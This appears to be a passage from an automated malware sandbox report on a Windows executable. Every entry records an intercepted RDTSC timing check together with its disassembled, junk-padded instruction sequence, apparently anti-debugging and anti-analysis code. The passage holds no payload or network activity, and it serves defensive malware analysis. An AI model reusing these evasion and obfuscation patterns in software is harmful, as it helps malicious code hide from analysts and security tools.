Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6B8D2 second address: D6B8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6C840 second address: D6C844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6B9C0 second address: D6B9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6D928 second address: D6D92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D6CB05 second address: D6CB0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6CB0F second address: D6CB25 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCAD7286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FFBBCAD7286h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6CB25 second address: D6CB3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D71B18 second address: D71BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FFBBCAD7288h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 xor dword ptr [ebp+124771E8h], ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007FFBBCAD7288h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov edi, 6CE78A36h 0x00000049 mov edi, 1281EF04h 0x0000004e push 00000000h 0x00000050 mov ebx, dword ptr [ebp+122D1AC7h] 0x00000056 jp 00007FFBBCAD7289h 0x0000005c xchg eax, esi 0x0000005d jmp 00007FFBBCAD7292h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FFBBCAD7294h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D75218 second address: D7521C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D7521C second address: D75237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c mov edi, 096EC600h 0x00000011 push 00000000h 0x00000013 mov bl, dl 0x00000015 xchg eax, esi 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D75237 second address: D7525B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jp 00007FFBBCD95563h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D75464 second address: D75469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D772A6 second address: D772AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D772AA second address: D772B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D782DB second address: D782EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FFBBCD95546h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D782EA second address: D782FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D7741D second address: D77435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBBCD9554Dh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D782FA second address: D782FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D793AB second address: D793D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jnp 00007FFBBCD95546h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFBBCD95558h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D793D6 second address: D793FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 add dword ptr [ebp+122D37E1h], eax 0x0000000e push 00000000h 0x00000010 mov ebx, eax 0x00000012 push 00000000h 0x00000014 mov bx, ax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007FFBBCAD728Bh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D84E05 second address: D84E26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBBCD95558h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D85252 second address: D85257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D85257 second address: D85273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBBCD95551h 0x00000008 jnc 00007FFBBCD95546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88B2F second address: D88B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88B3F second address: D88B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88B45 second address: D88B77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push esi 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e jno 00007FFBBCAD7286h 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88B77 second address: D88B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFBBCD95555h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88C1E second address: D88C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAAA second address: D8BAAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAAE second address: D8BAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAB4 second address: D8BAD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD95558h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAD0 second address: D8BAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FFBBCAD7286h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAE2 second address: D8BAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAE6 second address: D8BAEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAEA second address: D8BB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FFBBCD9554Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BB07 second address: D8BB0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BB0B second address: D8BB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007FFBBCD95546h 0x00000011 jp 00007FFBBCD95546h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D1F3A7 second address: D1F3AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D1F3AD second address: D1F3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFBBCD95546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9071C second address: D90720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90720 second address: D90732 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FFBBCD95557h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90732 second address: D90741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCAD728Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90741 second address: D90792 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCD95558h 0x00000008 jmp 00007FFBBCD95552h 0x0000000d jmp 00007FFBBCD95554h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FFBBCD95546h 0x0000001d jmp 00007FFBBCD95558h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90931 second address: D9094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCAD7296h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90C4C second address: D90C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90C50 second address: D90C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D912CA second address: D912FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCD95558h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FFBBCD95557h 0x00000013 jmp 00007FFBBCD9554Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D912FD second address: D91301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D91301 second address: D91335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95556h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFBBCD95558h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D96825 second address: D9682C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9682C second address: D9683E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FFBBCD95546h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66841 second address: D66845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66845 second address: D45117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub ch, 00000032h 0x0000000d mov edi, dword ptr [ebp+122D31DFh] 0x00000013 lea eax, dword ptr [ebp+12488577h] 0x00000019 jnl 00007FFBBCD9554Ch 0x0000001f mov edx, dword ptr [ebp+122D29C9h] 0x00000025 push eax 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007FFBBCD95558h 0x0000002d jmp 00007FFBBCD95553h 0x00000032 popad 0x00000033 jmp 00007FFBBCD95550h 0x00000038 popad 0x00000039 mov dword ptr [esp], eax 0x0000003c mov edx, ebx 0x0000003e call dword ptr [ebp+1245F295h] 0x00000044 jo 00007FFBBCD9557Fh 0x0000004a jmp 00007FFBBCD9554Ah 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FFBBCD95550h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66F35 second address: D66F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66F3A second address: D66F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b jne 00007FFBBCD9554Ch 0x00000011 and edi, dword ptr [ebp+12451154h] 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007FFBBCD9554Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D670F4 second address: D670F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D670F8 second address: D6710D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FFBBCD95548h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6710D second address: D67111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67531 second address: D67566 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FFBBCD95554h 0x00000010 push 0000001Eh 0x00000012 nop 0x00000013 push ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007FFBBCD95546h 0x0000001d popad 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67566 second address: D67578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCAD728Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67700 second address: D6770A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFBBCD95546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6770A second address: D6770E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678B7 second address: D678BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678BD second address: D678D0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBBCAD7288h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678D0 second address: D678D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678D5 second address: D678EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBBCAD7286h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D678EB second address: D67900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67900 second address: D6795A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 jmp 00007FFBBCAD7299h 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push edx 0x0000001d jmp 00007FFBBCAD7291h 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jng 00007FFBBCAD7286h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67A20 second address: D67A2A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBBCD9554Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67AE2 second address: D67AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67AEB second address: D67AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67AF1 second address: D67B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007FFBBCAD728Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D67B01 second address: D45BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FFBBCD95548h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 call dword ptr [ebp+12453D8Dh] 0x0000002c push eax 0x0000002d jnc 00007FFBBCD95548h 0x00000033 pushad 0x00000034 jno 00007FFBBCD95546h 0x0000003a pushad 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D959B2 second address: D959B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95B43 second address: D95B53 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FFBBCD95546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95B53 second address: D95B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95B57 second address: D95B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFBBCD95552h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBBCD9554Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95B81 second address: D95BA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7290h 0x00000007 pushad 0x00000008 jo 00007FFBBCAD7286h 0x0000000e jc 00007FFBBCAD7286h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D66F5C second address: D66F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D95F26 second address: D95F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D960C8 second address: D960D2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9B3B8 second address: D9B3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
